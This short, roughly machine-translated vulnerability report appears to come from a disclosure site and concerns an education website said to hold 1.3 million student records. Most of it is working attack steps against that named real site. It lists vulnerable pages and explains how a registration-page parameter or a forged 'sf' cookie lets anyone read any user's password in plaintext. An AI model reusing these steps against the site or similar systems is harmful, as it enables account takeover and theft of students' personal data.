Cookie injection packaging and arbitrary User Password Reading Vulnerability (1.3 million student data)
Cookie injection packaging and arbitrary User Password Reading Vulnerability (1.3 million student data)
Http://www.17xuexi.com/reg/reg3.asp? Jz_ OK = & username = admin
Username Injection
Http://www.17xuexi.com/new_web/my_info_1.asp
Http://www.17xuexi.com/myclass/
Http://www.17xuexi.com/lipin/
Http://www.17xuexi.com/payold/
Http://www.17xuexi.com/laoshi/laoshi.asp
Http://www.17xuexi.com/jiazhang/default.asp
Http://www.17xuexi.com/mx.asp
Cookie sf = username = testf Injection
Visit: http://www.17xuexi.com/reg/reg3.asp? Jz_ OK = & username = admin
Then visit: http://www.17xuexi.com/new_web/my_info_1.asp
The password can be read directly.
Or set sf = username = testf in the cookie to the user you want to read.
And access the http://www.17xuexi.com/new_web/iframe/gerenzx.asp to get the plaintext directly